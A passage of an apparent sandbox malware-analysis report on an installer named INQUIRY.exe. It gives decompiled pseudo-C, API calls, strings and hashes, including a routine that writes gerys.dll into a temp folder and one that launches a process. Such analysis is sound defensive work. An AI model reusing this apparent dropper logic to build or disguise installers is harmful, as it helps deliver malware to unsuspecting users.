                          • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                          • wsprintfA.USER32 ref: 004046A6
                          • SetDlgItemTextA.USER32 ref: 004046B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                          • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                          • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                          • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E00401BAD() {
                          				signed int _t28;
                          				CHAR* _t31;
                          				long _t32;
                          				int _t37;
                          				signed int _t38;
                          				int _t42;
                          				int _t48;
                          				struct HWND__* _t52;
                          				void* _t55;
                          
                          				 *(_t55 - 0x34) = E004029CB(3);
                          				 *(_t55 + 8) = E004029CB(4);
                          				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                          					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                          				}
                          				__eflags =  *(_t55 - 0x10) & 0x00000002;
                          				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                          					 *(_t55 + 8) = E004029E8(0x44);
                          				}
                          				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                          				_push(1);
                          				if(__eflags != 0) {
                          					_t50 = E004029E8();
                          					_t28 = E004029E8();
                          					asm("sbb ecx, ecx");
                          					asm("sbb eax, eax");
                          					_t31 =  ~( *_t27) & _t50;
                          					__eflags = _t31;
                          					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                          					goto L10;
                          				} else {
                          					_t52 = E004029CB();
                          					_t37 = E004029CB();
                          					_t48 =  *(_t55 - 0x10) >> 2;
                          					if(__eflags == 0) {
                          						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                          						L10:
                          						 *(_t55 - 8) = _t32;
                          					} else {
                          						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                          						asm("sbb eax, eax");
                          						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                          					}
                          				}
                          				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                          				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                          					_push( *(_t55 - 8));
                          					E004059E3();
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                          				return 0;
                          			}












                          0x00401bb6
                          0x00401bc2
                          0x00401bc5
                          0x00401bce
                          0x00401bce
                          0x00401bd1
                          0x00401bd5
                          0x00401bde
                          0x00401bde
                          0x00401be1
                          0x00401be5
                          0x00401be7
                          0x00401c34
                          0x00401c36
                          0x00401c3f
                          0x00401c47
                          0x00401c4a
                          0x00401c4a
                          0x00401c53
                          0x00000000
                          0x00401be9
                          0x00401bf0
                          0x00401bf2
                          0x00401bfa
                          0x00401bfd
                          0x00401c25
                          0x00401c59
                          0x00401c59
                          0x00401bff
                          0x00401c0d
                          0x00401c15
                          0x00401c18
                          0x00401c18
                          0x00401bfd
                          0x00401c5c
                          0x00401c5f
                          0x00401c65
                          0x00402825
                          0x00402825
                          0x00402880
                          0x0040288c

                          APIs
                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                          • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                          • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                          • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403897(void* __ecx, void* __eflags) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed short _t6;
                          				intOrPtr _t11;
                          				signed int _t13;
                          				intOrPtr _t15;
                          				signed int _t16;
                          				signed short* _t18;
                          				signed int _t20;
                          				signed short* _t23;
                          				intOrPtr _t25;
                          				signed int _t26;
                          				intOrPtr* _t27;
                          
                          				_t24 = "1033";
                          				_t13 = 0xffff;
                          				_t6 = E004059FC(__ecx, "1033");
                          				while(1) {
                          					_t26 =  *0x423ee4; // 0x1
                          					if(_t26 == 0) {
                          						goto L7;
                          					}
                          					_t15 =  *0x423eb0; // 0x51d818
                          					_t16 =  *(_t15 + 0x64);
                          					_t20 =  ~_t16;
                          					_t18 = _t16 * _t26 +  *0x423ee0;
                          					while(1) {
                          						_t18 = _t18 + _t20;
                          						_t26 = _t26 - 1;
                          						if((( *_t18 ^ _t6) & _t13) == 0) {
                          							break;
                          						}
                          						if(_t26 != 0) {
                          							continue;
                          						}
                          						goto L7;
                          					}
                          					 *0x423680 = _t18[1];
                          					 *0x423f48 = _t18[3];
                          					_t23 =  &(_t18[5]);
                          					if(_t23 != 0) {
                          						 *0x42367c = _t23;
                          						E004059E3(_t24,  *_t18 & 0x0000ffff);
                          						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "heifsmlbdxlebvytfzg Setup", 0xfffffffe));
                          						_t11 =  *0x423ecc; // 0x1
                          						_t27 =  *0x423ec8; // 0x51d9c4
                          						if(_t11 == 0) {
                          							L15:
                          							return _t11;
                          						}
                          						_t25 = _t11;
                          						do {
                          							_t11 =  *_t27;
                          							if(_t11 != 0) {
                          								_t5 = _t27 + 0x18; // 0x51d9dc
                          								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
                          							}
                          							_t27 = _t27 + 0x418;
                          							_t25 = _t25 - 1;
                          						} while (_t25 != 0);
                          						goto L15;
                          					}
                          					L7:
                          					if(_t13 != 0xffff) {
                          						_t13 = 0;
                          					} else {
                          						_t13 = 0x3ff;
                          					}
                          				}
                          			}

















                          0x0040389b
                          0x004038a0
                          0x004038a6
                          0x004038ab
                          0x004038ab
                          0x004038b3
                          0x00000000
                          0x00000000
                          0x004038b5
                          0x004038bb
                          0x004038c3
                          0x004038c5
                          0x004038cb
                          0x004038cb
                          0x004038cd
                          0x004038d9
                          0x00000000
                          0x00000000
                          0x004038dd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004038df
                          0x004038e4
                          0x004038ed
                          0x004038f3
                          0x004038f8
                          0x0040390c
                          0x00403917
                          0x0040392f
                          0x00403935
                          0x0040393a
                          0x00403942
                          0x00403963
                          0x00403963
                          0x00403963
                          0x00403944
                          0x00403946
                          0x00403946
                          0x0040394a
                          0x0040394d
                          0x00403951
                          0x00403951
                          0x00403956
                          0x0040395c
                          0x0040395c
                          0x00000000
                          0x00403946
                          0x004038fa
                          0x004038ff
                          0x00403908
                          0x00403901
                          0x00403901
                          0x00403901
                          0x004038ff

                          APIs
                          • SetWindowTextA.USER32(00000000,heifsmlbdxlebvytfzg Setup), ref: 0040392F
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\$heifsmlbdxlebvytfzg Setup
                          • API String ID: 530164218-3025496058
                          • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                          • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                          • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                          • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004052E5(CHAR* _a4) {
                          				struct _PROCESS_INFORMATION _v20;
                          				int _t7;
                          
                          				0x4224a0->cb = 0x44;
                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                          				if(_t7 != 0) {
                          					CloseHandle(_v20.hThread);
                          					return _v20.hProcess;
                          				}
                          				return _t7;
                          			}





                          0x004052ee
                          0x0040530a
                          0x00405312
                          0x00405317
                          0x00000000
                          0x0040531d
                          0x00405321

                          APIs
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                          • CloseHandle.KERNEL32(?), ref: 00405317
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                          • Error launching installer, xrefs: 004052F8
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                          • API String ID: 3712363035-1785902839
                          • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                          • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                          • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                          • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405578(CHAR* _a4) {
                          				CHAR* _t7;
                          
                          				_t7 = _a4;
                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                          					lstrcatA(_t7, 0x40900c);
                          				}
                          				return _t7;
                          			}




                          0x00405579
                          0x00405590
                          0x00405598
                          0x00405598
                          0x004055a0

                          APIs
                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                          • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3081826266
                          • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                          • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                          • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                          • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E00401EC5(char __ebx, char* __edi, char* __esi) {
                          				char* _t18;
                          				int _t19;
                          				void* _t30;
                          
                          				_t18 = E004029E8(0xffffffee);
                          				 *(_t30 - 0x2c) = _t18;
                          				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                          				 *__esi = __ebx;
                          				 *(_t30 - 8) = _t19;
                          				 *__edi = __ebx;
                          				 *((intOrPtr*)(_t30 - 4)) = 1;
                          				if(_t19 != __ebx) {
                          					__eax = GlobalAlloc(0x40, __eax);
                          					 *(__ebp + 8) = __eax;
                          					if(__eax != __ebx) {
                          						if(__eax != 0) {
                          							__ebp - 0x44 = __ebp - 0x34;
                          							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                          								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                          								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                          								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                          							}
                          						}
                          						_push( *(__ebp + 8));
                          						GlobalFree();
                          					}
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                          				return 0;
                          			}






                          0x00401ec7
                          0x00401ecf
                          0x00401ed4
                          0x00401ed9
                          0x00401edd
                          0x00401ee0
                          0x00401ee2
                          0x00401ee9
                          0x00401ef2
                          0x00401efa
                          0x00401efd
                          0x00401f12
                          0x00401f18
                          0x00401f2b
                          0x00401f34
                          0x00401f40
                          0x00401f45
                          0x00401f45
                          0x00401f2b
                          0x00401f48
                          0x00401b75
                          0x00401b75
                          0x00401efd
                          0x00402880
                          0x0040288c

                          APIs
                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                          • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                            • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 1404258612-0
                          • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                          • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                          • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                          • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E00401D1B() {
                          				void* __esi;
                          				int _t6;
                          				signed char _t11;
                          				struct HFONT__* _t14;
                          				void* _t18;
                          				void* _t24;
                          				void* _t26;
                          				void* _t28;
                          
                          				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                          				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                          				 *0x40af7c = E004029CB(3);
                          				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                          				 *0x40af83 = 1;
                          				 *0x40af80 = _t11 & 0x00000001;
                          				 *0x40af81 = _t11 & 0x00000002;
                          				 *0x40af82 = _t11 & 0x00000004;
                          				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                          				_t14 = CreateFontIndirectA(0x40af6c);
                          				_push(_t14);
                          				_push(_t26);
                          				E004059E3();
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                          				return 0;
                          			}











                          0x00401d29
                          0x00401d42
                          0x00401d4c
                          0x00401d51
                          0x00401d5c
                          0x00401d63
                          0x00401d75
                          0x00401d7b
                          0x00401d80
                          0x00401d8a
                          0x004024aa
                          0x00401561
                          0x00402825
                          0x00402880
                          0x0040288c

                          APIs
                          • GetDC.USER32(?), ref: 00401D22
                          • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                          • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirect
                          • String ID:
                          • API String ID: 3272661963-0
                          • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                          • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                          • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                          • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                          				long _t22;
                          
                          				if(_a8 != 0x102) {
                          					if(_a8 != 0x200) {
                          						_t22 = _a16;
                          						L7:
                          						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                          							 *0x420480 = _t22;
                          							E00405A85(0x420498, 0x424000);
                          							E004059E3(0x424000, _t22);
                          							E0040140B(6);
                          							E00405A85(0x424000, 0x420498);
                          						}
                          						L11:
                          						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                          					}
                          					if(IsWindowVisible(_a4) == 0) {
                          						L10:
                          						_t22 = _a16;
                          						goto L11;
                          					}
                          					_t22 = E004046F2(_a4, 1);
                          					_a8 = 0x419;
                          					goto L7;
                          				}
                          				if(_a12 != 0x20) {
                          					goto L10;
                          				}
                          				E00403E83(0x413);
                          				return 0;
                          			}




                          0x00404d7f
                          0x00404da4
                          0x00404dc4
                          0x00404dc7
                          0x00404dca
                          0x00404de1
                          0x00404de7
                          0x00404dee
                          0x00404df5
                          0x00404dfc
                          0x00404e01
                          0x00404e07
                          0x00000000
                          0x00404e17
                          0x00404db1
                          0x00404e04
                          0x00404e04
                          0x00000000
                          0x00404e04
                          0x00404dbd
                          0x00404dbf
                          0x00000000
                          0x00404dbf
                          0x00404d85
                          0x00000000
                          0x00000000
                          0x00404d8c
                          0x00000000

                          APIs
                          • IsWindowVisible.USER32(?), ref: 00404DA9
                          • CallWindowProcA.USER32 ref: 00404E17
                            • Part of subcall function 00403E83: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                          • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                          • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                          • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                          				int _t5;
                          				long _t7;
                          				struct _OVERLAPPED* _t11;
                          				intOrPtr* _t15;
                          				void* _t17;
                          				int _t21;
                          
                          				_t15 = __esi;
                          				_t11 = __ebx;
                          				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                          					_t7 = lstrlenA(E004029E8(0x11));
                          				} else {
                          					E004029CB(1);
                          					 *0x409f68 = __al;
                          				}
                          				if( *_t15 == _t11) {
                          					L8:
                          					 *((intOrPtr*)(_t17 - 4)) = 1;
                          				} else {
                          					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsc48D6.tmp\gerys.dll", _t7, _t17 + 8, _t11);
                          					_t21 = _t5;
                          					if(_t21 == 0) {
                          						goto L8;
                          					}
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                          				return 0;
                          			}









                          0x004024b0
                          0x004024b0
                          0x004024b3
                          0x004024ce
                          0x004024b5
                          0x004024b7
                          0x004024bc
                          0x004024c3
                          0x004024d5
                          0x0040264e
                          0x0040264e
                          0x004024db
                          0x004024ed
                          0x004015a6
                          0x004015a8
                          0x00000000
                          0x004015ae
                          0x004015a8
                          0x00402880
                          0x0040288c

                          APIs
                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll, xrefs: 004024BC, 004024E1
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: FileWritelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll
                          • API String ID: 427699356-1374204204
                          • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                          • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                          • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                          • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004055BF(char* _a4) {
                          				char* _t3;
                          				char* _t5;
                          
                          				_t5 = _a4;
                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                          				while( *_t3 != 0x5c) {
                          					_t3 = CharPrevA(_t5, _t3);
                          					if(_t3 > _t5) {
                          						continue;
                          					}
                          					break;
                          				}
                          				 *_t3 =  *_t3 & 0x00000000;
                          				return  &(_t3[1]);
                          			}





                          0x004055c0
                          0x004055ca
                          0x004055cc
                          0x004055d3
                          0x004055db
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004055db
                          0x004055dd
                          0x004055e2

                          APIs
                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY.exe,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 004055C5
                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY.exe,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 004055D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
